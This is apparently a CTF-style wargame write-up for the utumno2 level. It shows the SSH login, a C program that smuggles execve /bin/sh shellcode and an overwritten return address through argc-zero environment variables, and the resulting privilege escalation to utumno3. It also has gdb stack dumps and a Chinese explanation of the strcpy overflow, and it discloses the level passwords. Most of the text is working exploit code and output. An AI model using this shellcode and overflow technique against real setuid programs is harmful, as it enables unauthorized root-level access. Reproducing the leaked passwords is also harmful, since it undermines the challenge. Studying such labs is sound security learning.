root@today:~# ssh utumno2@178.79.134.250
utumno2@178.79.134.250's password: ceewaceiph
utumno2@melinda:~$ cd /tmp
utumno2@melinda:/tmp$ mkdir utu2
utumno2@melinda:/tmp$ cd utu2
utumno2@melinda:/tmp/utu2$ cat hacker.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
char *arg[] = {0x00};
char *envp[] = {
"", "", "", "", "", "", "", "", /* 8 times */
"\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80",
"UUUUUUUUUUUUUUUUUUUUUUUU\xb2\xdf\xff\xff",
NULL
};
execve("/utumno/utumno2", arg, envp);
perror("execve");
exit(1);
}
utumno2@melinda:/tmp/utu2$ gcc hacker.c -o hacker -g -m32
utumno2@melinda:/tmp/utu2$ ./hacker
$ whoami
utumno3
$ cat /etc/utumno_pass/utumno3
zuudafiine
$
调用execve是为了设置环境变量,并且把argc设置为0,
环境变量前8个设置为空串是为了 add $0x28,%eax
mov 0xc(%ebp),%eax
这时候eax指向argv开始的栈地址
add $0x28,%eax
mov (%eax),%eax
argv[0]为空, 让eax指向"UUUUUUUUUUUUUUUUUUUUUUUU\xb2\xdf\xff\xff"的栈地址
strcpy把main函数的eip覆盖为shellcode的地址,既env[8]的地址
< ========================================================== >
┌──────────────────────────────────────────────────────────────────────┐
│0x804845d <main> push %ebp │
│0x804845e <main+1> mov %esp,%ebp │
│0x8048460 <main+3> and $0xfffffff0,%esp │
│0x8048463 <main+6> sub $0x20,%esp │
│0x8048466 <main+9> cmpl $0x0,0x8(%ebp) │
│0x804846a <main+13> je 0x8048484 <main+39> │
│0x804846c <main+15> movl $0x8048540,(%esp) │
│0x8048473 <main+22> call 0x8048320 <puts@plt> │
│0x8048478 <main+27> movl $0x1,(%esp) │
│0x804847f <main+34> call 0x8048340 <exit@plt> │
│0x8048484 <main+39> mov 0xc(%ebp),%eax │
│0x8048487 <main+42> add $0x28,%eax │
│0x804848a <main+45> mov (%eax),%eax │
│0x804848c <main+47> mov %eax,0x4(%esp) │
│0x8048490 <main+51> lea 0x14(%esp),%eax │
│0x8048494 <main+55> mov %eax,(%esp) │
│0x8048497 <main+58> call 0x8048310 <strcpy@plt> │
│0x804849c <main+63> mov $0x0,%eax │
│0x80484a1 <main+68> leave │
│0x80484a2 <main+69> ret │
(gdb) b *main
Breakpoint 1 at 0x804847d: file hacker.c, line 6.
(gdb) run
Starting program: /tmp/utu2/hacker
Breakpoint 1, main (argc=1, argv=0xffffd684) at hacker.c:6
(gdb) c
Continuing.
process 5903 is executing new program: /games/utumno/utumno2
Breakpoint 1, main (argc=0, argv=0xffffdeb4) at utumno2.c:20
(gdb) ni
(gdb) x/14dbx $ebp
0xffffde18: (ebp + 0x00)0x00 0x00 0x00 0x00(push ebp) (ebp + 0x04)0x63 0xda 0xe3 0xf7(next eip)
0xffffde20: (ebp + 0x08)0x00 0x00 0x00 0x00(argc) (ebp + 0x0c)0xb4 0xde 0xff 0xff(argv)
0xffffde28: (ebp + 0x10)0xb8 0xde 0xff 0xff(env)
(gdb) x/48dbx 0xffffdeb4
0xffffdeb4: (argv[0])0x00 0x00 0x00 0x00 (env[0])0xaa 0xdf 0xff 0xff
0xffffdebc: (env[1])0xab 0xdf 0xff 0xff (env[2])0xac 0xdf 0xff 0xff
0xffffdec4: (env[3])0xad 0xdf 0xff 0xff (env[4])0xae 0xdf 0xff 0xff
0xffffdecc: (env[5])0xaf 0xdf 0xff 0xff (env[6])0xb0 0xdf 0xff 0xff
0xffffded4: (env[7])0xb1 0xdf 0xff 0xff (env[8])0xb2 0xdf 0xff 0xff
0xffffdedc: (env[9])0xcb 0xdf 0xff 0xff 0x00 0x00 0x00 0x00
mov 0xc(%ebp),%eax ;eax = (0xffffde24) = 0xffffdeb4
add $0x28,%eax ;eax = 0xffffdeb4 + 0x28 = 0xffffdedc
(gdb) x/24dbx 0xffffdfb2
0xffffdfb2: 0x6a 0x0b 0x58 0x31 0xf6 0x56 0x68 0x2f
0xffffdfba: 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e
0xffffdfc2: 0x89 0xe3 0x31 0xc9 0x89 0xca 0xcd 0x80
(gdb) x/29dbx 0xffffdfcb
0xffffdfcb: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfd3: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfdb: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55
0xffffdfe3: 0xb2 0xdf 0xff 0xff 0x00
/** stack environment of main
* eip (4B)
* ebp (4B)
* align (8B)
* main stack (12B)
* <== buffer
* main stack (20B)
*/
strcpy(buffer, argv[10])